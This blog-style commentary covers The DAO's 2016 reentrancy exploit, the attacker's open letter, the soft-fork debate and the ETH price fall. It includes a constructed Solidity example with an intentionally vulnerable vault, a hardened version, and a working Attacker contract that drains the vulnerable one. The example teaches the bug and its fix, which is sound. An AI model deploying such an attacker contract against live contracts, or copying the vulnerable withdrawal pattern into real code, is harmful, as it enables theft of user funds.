On Friday evening, “The DAO” framework code was exploited: an attacker drained 3.6m ETH (~$40m at current prices) from the contract. The ether is not yet gone, because the DAO’s split mechanism imposes a significant waiting period before funds moved out by a split can be withdrawn.
This was possible because of a reentrancy bug in the code. The split function sent the caller’s ether out before it updated the caller’s recorded balance, so the attacker’s contract re-entered the same split function from within the payment call and collected its share many times over in a single transaction. This class of bug has been well known for some time, and many other deployed contracts are vulnerable to it.
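As an added illustration (not The DAO’s own code, and written in current Solidity rather than the 2016 dialect The DAO used), here is a minimal vault with the same reentrancy pattern next to its hardened form, plus the attacker contract that exploits it. The contract and function names (IVault, VulnerableVault, SafeVault, Attacker) are made up for this example:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example, not The DAO's code: a minimal vault showing the
// "pay out, then update state" bug and the checks-effects-interactions fix.
interface IVault {
    function deposit() external payable;
    function withdraw() external;
}

contract VulnerableVault is IVault {
    mapping(address => uint256) public balances;

    function deposit() external payable override {
        balances[msg.sender] += msg.value;
    }

    // BUG: the external call runs before the balance is zeroed. The
    // recipient's receive() executes while its old balance is still on
    // record and can call withdraw() again with the same balance.
    function withdraw() external override {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // too late: re-entrant calls already paid out
    }
}

contract SafeVault is IVault {
    mapping(address => uint256) public balances;
    bool private locked;

    // Belt-and-braces guard: a re-entrant call into any guarded function reverts.
    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable override {
        balances[msg.sender] += msg.value;
    }

    // Checks-effects-interactions: validate, update state, then make the
    // external call. A re-entrant call now sees a zero balance and reverts.
    function withdraw() external override nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Attacker: deposits 1 ether, calls withdraw(), and re-enters withdraw() from
// receive() for as long as the vault still holds at least 1 ether.
contract Attacker {
    IVault public target;

    constructor(IVault _target) {
        target = _target;
    }

    function attack() external payable {
        require(msg.value >= 1 ether, "need 1 ether");
        target.deposit{value: 1 ether}();
        target.withdraw();
    }

    // Each incoming payment from the vault re-enters withdraw(). Against
    // VulnerableVault the recorded balance is still 1 ether each time.
    receive() external payable {
        if (address(target).balance >= 1 ether) {
            target.withdraw();
        }
    }
}
```

Pointed at VulnerableVault, attack() drains the vault down to its last partial ether in one transaction. Pointed at SafeVault, the re-entrant withdraw() reverts (zero balance and the lock), which makes receive() revert, which makes the vault’s call fail, which reverts the whole transaction; the attacker gets nothing and its own deposit is rolled back.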
The attacker, or someone posing as him (the letter was not properly signed), has written an open letter defending his actions. He claims the ether is his by the terms of the smart contract. Real attacker or not, he is not necessarily wrong: the contract is the code itself. This should spur a wider discussion about bugs in Solidity contracts, about intent versus code, and about how to fork safely. Bugs happen, and any system that assumes otherwise is naive.
The DAO and ETH communities have suggested a soft fork under which miners would treat any transaction moving funds from the attacker’s address as invalid, giving the community time beyond the 27-day split period to decide what to do. Such interventions could undermine confidence not only in The DAO but in ETH itself. In response to the attack, ETH has already dropped from a high of $21 to a low of $11.
This exposure raises questions about the future of The DAO and of any platform that wishes to replicate it. There will be questions for the founders of the project and for Deja Vu, the security firm that audited the DAO code. It appears clear that the launch was too hasty. The list of serious DAO issues grows by the day.
As Emin Gün Sirer (author of one of the best cryptocurrency & code blogs, Hacking Distributed) writes:
I have to say, calling this specific contract “The DAO” was quite presumptive. It usurped the word, and now ended up tarnishing it.
There have been several good trading opportunities on the back of this, and informed traders took advantage of them. If The DAO fixes its code and the stolen ETH is returned, will that be enough to restore faith? If so, this will prove to have been a great buying opportunity for ETH. Otherwise the downtrend will continue, and the focus will remain on Bitcoin.